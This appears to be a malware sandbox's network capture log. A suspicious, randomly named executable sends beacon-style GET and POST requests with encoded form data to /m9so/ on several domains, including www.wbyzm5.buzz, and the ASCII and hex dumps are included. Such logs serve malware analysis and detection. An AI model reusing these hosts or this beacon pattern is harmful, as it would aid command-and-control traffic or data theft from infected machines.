                                                                                    Mar 18, 2024 14:49:52.032854080 CET10288OUTData Raw: 42 43 53 49 70 68 49 77 6a 58 58 2f 39 55 30 76 4b 49 6c 77 33 70 6f 58 4f 4b 70 72 4d 6f 47 49 70 72 79 78 41 75 32 56 32 49 35 75 65 57 5a 55 62 61 2f 44 45 6a 65 48 30 66 4b 30 44 5a 61 65 75 43 5a 46 65 6b 6a 52 78 4a 4e 55 6f 77 79 39 50 4c
                                                                                    Data Ascii: BCSIphIwjXX/9U0vKIlw3poXOKprMoGIpryxAu2V2I5ueWZUba/DEjeH0fK0DZaeuCZFekjRxJNUowy9PLC/BI49y/ftDI13aCP45aGjQIwfWrJmu2L9jBFX8kIZAiO4WgU2zHzMYGO9RZP5YxyEU40Ax34h+NGDMJEbUh24kUDWGhovIKvBxvR0Grji2jnOVpnfXaqUPkvM+XuzFUzCt++VhU9j2rVfEE8tdHazPeZwVwxR1/c
                                                                                    Mar 18, 2024 14:49:52.188318014 CET5144OUTData Raw: 79 4d 4b 77 69 50 4c 71 7a 76 65 76 6b 50 4f 51 34 45 7a 49 50 54 64 4a 68 4a 6c 4e 6e 31 52 30 71 46 6a 2b 65 56 44 76 62 56 65 70 33 55 6b 62 70 76 7a 66 52 44 43 4a 34 6b 43 47 37 31 48 35 56 71 63 71 34 49 50 43 38 37 74 71 67 38 6e 62 6b 55
                                                                                    Data Ascii: yMKwiPLqzvevkPOQ4EzIPTdJhJlNn1R0qFj+eVDvbVep3UkbpvzfRDCJ4kCG71H5Vqcq4IPC87tqg8nbkUvqbe2S6yAf2sjik1RDdcl8f4moxQ6rk76LDI4ihOwfB4jjkJO91qCV9ZAlpEYmgdtSrslguPXOI8klptEUpm/e3oVBzV/7cN12c1mk55ibsJZ2opg/WHFFDMeygH/GnGrF0ohT7tlYRZ2zRNNy1+PIwWiHWYWsGyX
                                                                                    Mar 18, 2024 14:49:52.188406944 CET2572OUTData Raw: 42 52 38 73 36 6b 4c 63 4a 79 4b 54 2f 61 62 41 47 70 42 32 37 42 46 65 42 51 66 6c 6d 44 33 52 6e 58 42 68 5a 70 69 6e 4b 48 63 78 49 78 32 59 71 68 66 6e 79 74 4d 5a 59 4d 48 56 74 62 39 4e 69 36 56 32 61 7a 35 2b 48 77 71 52 4c 43 7a 59 61 75
                                                                                    Data Ascii: BR8s6kLcJyKT/abAGpB27BFeBQflmD3RnXBhZpinKHcxIx2YqhfnytMZYMHVtb9Ni6V2az5+HwqRLCzYauLFZg5+sdFjfcIviktgvVvETL7WUgOIhTjumqucK8qrjHj85GiufOp+wHe80wI0H/3Ycy+cGw/koDFCnai016uf7srDu8NhSGGGrwuyLlcYD3xjW2V6f69qiNseFNGYcuvKoQXg8PI0fx2XD/cmN9y0+fTltp6RvC2


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.11.204979984.32.84.32807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:49:54.719266891 CET541OUTGET /m9so/?LFPxWlV=Jw+Ed+ZUGSr/+oJmj9kqbUJ4ViEG6A6UoqQX6gR3ieyHczkITEu4GAJNfTznjio58VSbv2GXL5IQ0LBvochodTMqi4TIQu8e5uWV6iD6Y5Xd5nwlY+1LHT8=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:49:54.874099970 CET1286INHTTP/1.1 200 OK
                                                                                    Server: hcdn
                                                                                    Date: Mon, 18 Mar 2024 13:49:54 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 10066
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    x-hcdn-request-id: 8a77be83ddb8cea5afab55ea81d2f021-phx-edge1
                                                                                    Expires: Mon, 18 Mar 2024 13:49:53 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67
                                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding
                                                                                    Mar 18, 2024 14:49:54.874159098 CET1286INData Raw: 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23
                                                                                    Data Ascii: :0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weigh
                                                                                    Mar 18, 2024 14:49:54.874218941 CET1286INData Raw: 72 3a 23 63 64 63 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61
                                                                                    Data Ascii: r:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:2
                                                                                    Mar 18, 2024 14:49:54.874274969 CET1286INData Raw: 67 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d
                                                                                    Data Ascii: ge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.mess
                                                                                    Mar 18, 2024 14:49:54.874331951 CET1286INData Raw: 67 65 72 2e 63 6f 6d 2f 74 75 74 6f 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c
                                                                                    Data Ascii: ger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href
                                                                                    Mar 18, 2024 14:49:54.874387026 CET1286INData Raw: 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                                                    Data Ascii: y website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-ti
                                                                                    Mar 18, 2024 14:49:54.874439955 CET1286INData Raw: 66 6f 72 28 76 61 72 20 72 2c 65 3d 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72
                                                                                    Data Ascii: for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}retu
                                                                                    Mar 18, 2024 14:49:54.874492884 CET1286INData Raw: 31 29 2d 36 35 3c 32 36 29 2c 6d 2e 73 70 6c 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66
                                                                                    Data Ascii: 1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var
                                                                                    Mar 18, 2024 14:49:54.874538898 CET118INData Raw: 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70
                                                                                    Data Ascii: .location.hostname,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.11.2049804172.67.130.3807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:51:36.209099054 CET790OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Origin: http://www.wbyzm5.buzz
                                                                                    Referer: http://www.wbyzm5.buzz/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 72 39 57 59 76 38 76 62 55 30 48 57 72 4b 2f 31 71 41 61 77 47 58 31 34 57 41 34 4b 2f 56 42 39 65 36 49 6e 35 51 2b 6f 44 33 42 74 54 35 44 71 5a 74 58 73 61 65 2f 41 47 4d 63 46 4a 36 54 2b 39 6b 65 53 68 67 67 50 4d 77 48 6d 56 52 30 73 76 39 67 6a 76 77 61 35 65 2b 59 55 62 69 73 79 6f 69 36 72 6d 69 4b 5a 46 49 37 6d 4f 38 74 46 73 56 46 73 50 66 43 69 70 61 49 35 55 4c 62 6f 77 56 44 54 34 46 2b 36 66 37 30 48 7a 34 43 59 37 6d 54 79 30 32 54 52 62 30 62 54 42 75 56 55 48 6c 52 31 41 59 6c 52 7a 5a 71 63 35 33 63 42 5a 33 49 42 53 62 52 4f 69 52 70 53 54 68 6f 6e 48 51 3d 3d
                                                                                    Data Ascii: LFPxWlV=r9WYv8vbU0HWrK/1qAawGX14WA4K/VB9e6In5Q+oD3BtT5DqZtXsae/AGMcFJ6T+9keShggPMwHmVR0sv9gjvwa5e+YUbisyoi6rmiKZFI7mO8tFsVFsPfCipaI5ULbowVDT4F+6f70Hz4CY7mTy02TRb0bTBuVUHlR1AYlRzZqc53cBZ3IBSbROiRpSThonHQ==
                                                                                    Mar 18, 2024 14:51:36.317581892 CET667INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 13:51:36 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 18 Mar 2024 14:51:36 GMT
                                                                                    Location: https://www.wbyzm5.buzz/m9so/
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q9xJVC0%2Fx7m2dHvrJ0f1l5oDT%2Fpts9CUhETxfKeAvlFPKb%2BsmLbLzEVz9QM5h%2F%2B555U6QXn8MnZlCS2RgKxjNBw9j5je72w56fQ3b%2FNFWderwDA0I48ZDia59SUpPED2sW0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665b2cb9dcd42ac-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.11.2049805172.67.130.3807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:51:38.822796106 CET1130OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Origin: http://www.wbyzm5.buzz
                                                                                    Referer: http://www.wbyzm5.buzz/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 72 39 57 59 76 38 76 62 55 30 48 57 71 71 50 31 6d 44 79 77 42 33 31 6e 49 51 34 4b 6c 6c 42 35 65 36 55 6e 35 53 54 7a 41 43 5a 74 54 5a 54 71 59 76 7a 73 64 65 2f 41 4f 73 63 45 48 61 53 77 39 6b 53 77 68 68 4d 50 4d 32 72 6d 57 44 38 73 6f 4e 67 67 67 51 61 36 58 65 59 58 66 69 73 34 6f 69 32 4e 6d 6a 4f 5a 47 34 58 6d 50 35 5a 46 6f 41 70 76 46 66 43 67 67 36 49 32 42 37 62 6d 77 56 50 74 34 42 2f 4e 65 49 6f 48 7a 62 36 59 36 6d 54 78 2b 47 54 4b 54 55 61 44 4e 37 34 36 4b 78 6b 44 47 2f 64 6b 36 37 4f 63 77 51 77 44 52 6c 42 38 56 4c 70 74 6d 31 73 7a 57 68 42 66 55 42 6d 79 50 66 57 44 36 51 2b 53 44 42 6f 31 6f 71 69 57 7a 52 2f 44 74 6b 2f 79 34 53 46 73 55 33 61 54 72 62 2f 56 30 4b 46 4d 6c 67 50 46 36 6a 6e 51 74 4e 73 71 37 72 37 76 4a 51 42 76 5a 64 47 4a 2b 63 77 2b 7a 4d 2b 44 4b 33 72 59 2f 61 48 6d 4d 37 66 72 4c 70 54 74 66 2f 57 4b 55 6f 34 58 6f 7a 56 59 46 79 7a 66 72 67 46 74 38 62 46 6c 75 5a 49 66 76 48 54 55 51 69 6d 38 77 64 32 32 36 61 4e 66 36 34 63 67 76 7a 77 74 42 41 6e 37 48 62 4d 45 4c 58 51 6d 47 55 34 72 57 6a 72 38 57 64 34 42 53 69 54 6e 77 56 44 34 4c 4d 2f 7a 38 67 77 58 46 48 31 65 66 57 4e 74 39 41 64 30 62 46 52 43 45 72 36 71 39 38 52 69 59 43 47 75 48 5a 34 6c 47 39 6b 4f 45 59 74 62 59 35 66 33 57 61 30 74 53 35 57 2b 32 72 66 4a 7a 71 41 57 56 47 55 33 66 39 41 62 6f 4c 4b 57 4b 6e 63 78 63 66 77 56 73 39 43 4a 66 31 65 67 4d 7a 47 79 50 6c 71 39 43 4f 68 6e 58 64 76 6c 5a 67 33 52 55 7a 51 44 62 41 6c 63 31 68 35 38 64 6e 54 59 37 47 57 52 67 64 36 62 75 69 68 41 75 75 39 46 42 37 68 46 66 37 79 62 62 4b 38 4a 65 6a 68 31 30 41 38 3d
                                                                                    Data Ascii: LFPxWlV=r9WYv8vbU0HWqqP1mDywB31nIQ4KllB5e6Un5STzACZtTZTqYvzsde/AOscEHaSw9kSwhhMPM2rmWD8soNgggQa6XeYXfis4oi2NmjOZG4XmP5ZFoApvFfCgg6I2B7bmwVPt4B/NeIoHzb6Y6mTx+GTKTUaDN746KxkDG/dk67OcwQwDRlB8VLptm1szWhBfUBmyPfWD6Q+SDBo1oqiWzR/Dtk/y4SFsU3aTrb/V0KFMlgPF6jnQtNsq7r7vJQBvZdGJ+cw+zM+DK3rY/aHmM7frLpTtf/WKUo4XozVYFyzfrgFt8bFluZIfvHTUQim8wd226aNf64cgvzwtBAn7HbMELXQmGU4rWjr8Wd4BSiTnwVD4LM/z8gwXFH1efWNt9Ad0bFRCEr6q98RiYCGuHZ4lG9kOEYtbY5f3Wa0tS5W+2rfJzqAWVGU3f9AboLKWKncxcfwVs9CJf1egMzGyPlq9COhnXdvlZg3RUzQDbAlc1h58dnTY7GWRgd6buihAuu9FB7hFf7ybbK8Jejh10A8=
                                                                                    Mar 18, 2024 14:51:38.928982019 CET665INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 13:51:38 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 18 Mar 2024 14:51:38 GMT
                                                                                    Location: https://www.wbyzm5.buzz/m9so/
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yEW%2BPI93Hgk9vUF7n%2BHXCFaite2qiVAiGtlkaNbsjMzCmSAQ58mrvWqsJohYsfHKpXTITf%2FIm87S6bPHVw8N%2BMsz8divC4YhmtwZGj9c8KxyA%2FqQngOluE9wBAlxIHemlRk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665b2dbfa18c3ee-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.11.2049806172.67.130.3807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:51:41.448381901 CET9002OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Origin: http://www.wbyzm5.buzz
                                                                                    Referer: http://www.wbyzm5.buzz/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 72 39 57 59 76 38 76 62 55 30 48 57 71 71 50 31 6d 44 79 77 42 33 31 6e 49 51 34 4b 6c 6c 42 35 65 36 55 6e 35 53 54 7a 41 43 52 74 53 71 4c 71 59 50 50 73 63 65 2f 41 45 4d 63 42 48 61 54 73 39 6e 69 30 68 67 77 66 4d 31 66 6d 50 77 45 73 70 37 55 67 77 67 61 42 53 65 59 56 62 69 74 78 6f 69 37 55 6d 6a 4b 6e 46 49 6a 6d 4f 2b 31 46 73 33 64 73 47 50 43 69 67 36 49 4d 51 4c 62 59 77 56 4c 39 34 42 44 4e 65 4c 63 48 68 65 2b 59 34 33 54 78 68 32 54 56 64 30 61 63 47 62 34 66 4b 78 5a 30 47 2f 64 72 36 35 69 63 77 58 6b 44 51 6d 35 39 51 62 70 74 39 31 73 38 63 78 39 62 55 41 50 33 50 65 79 44 36 51 57 53 43 68 6f 31 74 4c 69 56 36 52 2f 4e 2b 30 2f 62 38 53 42 6b 55 33 66 71 72 62 72 56 30 2b 74 4d 30 42 50 46 2f 43 6e 51 67 4e 73 53 32 4c 36 70 44 77 42 4a 5a 64 57 6a 2b 63 51 45 7a 4c 47 44 4c 56 54 59 76 72 48 6c 4b 62 66 74 45 4a 54 38 4a 2f 61 65 55 73 6c 56 6f 7a 56 49 46 77 66 66 72 51 56 74 39 61 46 69 75 4a 49 59 6c 58 54 46 48 79 36 4d 77 64 71 74 36 61 46 50 36 2f 45 67 67 7a 77 74 52 51 62 34 50 72 4d 48 45 33 51 77 5a 6b 35 7a 57 69 58 61 57 63 4d 33 54 53 76 6e 69 31 54 34 61 73 2f 77 34 41 77 74 50 6e 31 63 55 32 4e 74 39 41 52 67 62 46 4e 43 46 66 32 71 38 4c 31 69 61 56 53 75 42 5a 35 67 47 39 6c 53 45 59 68 42 59 35 58 5a 57 62 45 44 53 37 36 2b 32 34 58 4a 32 72 41 56 51 32 55 49 4a 4e 41 4d 32 37 48 41 4b 6e 42 38 63 66 68 69 73 50 47 4a 65 31 75 67 47 54 47 31 46 6c 72 31 4b 75 68 39 41 74 6a 44 5a 6a 54 72 55 79 56 63 62 47 68 63 31 46 4a 69 47 33 48 49 73 31 36 2f 6b 75 61 53 74 77 49 54 75 75 34 78 46 35 39 7a 63 38 36 7a 46 5a 49 62 43 47 34 30 67 6c 6e 31 2f 48 55 54 59 4a 6b 66 63 2f 77 5a 30 35 54 38 6f 67 79 6d 6f 49 45 50 53 4c 70 48 44 76 30 2f 76 58 54 48 66 57 71 41 4d 2f 46 77 6f 7a 42 55 72 71 48 77 38 73 4b 31 74 33 63 36 6f 65 61 4d 49 42 42 32 67 54 4a 4a 47 37 42 69 4d 6e 6a 4d 7a 49 76 63 54 37 6e 58 30 72 63 2b 53 33 4e 32 6c 36 73 6c 51 47 6c 30 50 5a 66 73 67 69 50 52 34 62 38 59 6a 47 70 75 79 5a 45 7a 68 2f 65 35 6e 45 35 6e 4f 75 61 55 4b 34 49 6d 43 6c 34 5a 59 4b 2b 37 37 56 33 6f 67 77 4b 31 7a 30 38 33 34 4f 77 45 47 4a 49 61 48 54 73 7a 47 76 53 4a 47 5a 79 54 39 71 59 48 5a 77 7a 47 72 66 75 33 34 5a 6a 56 63 59 79 36 74 2f 50 55 33 50 6c 6e 48 56 6e 54 45 74 6c 4b 7a 51 57 46 51 55 36 73 6c 56 41 46 70 58 4f 42 37 34 37 76 37 76 64 39 63 49 75 46 77 31 6e 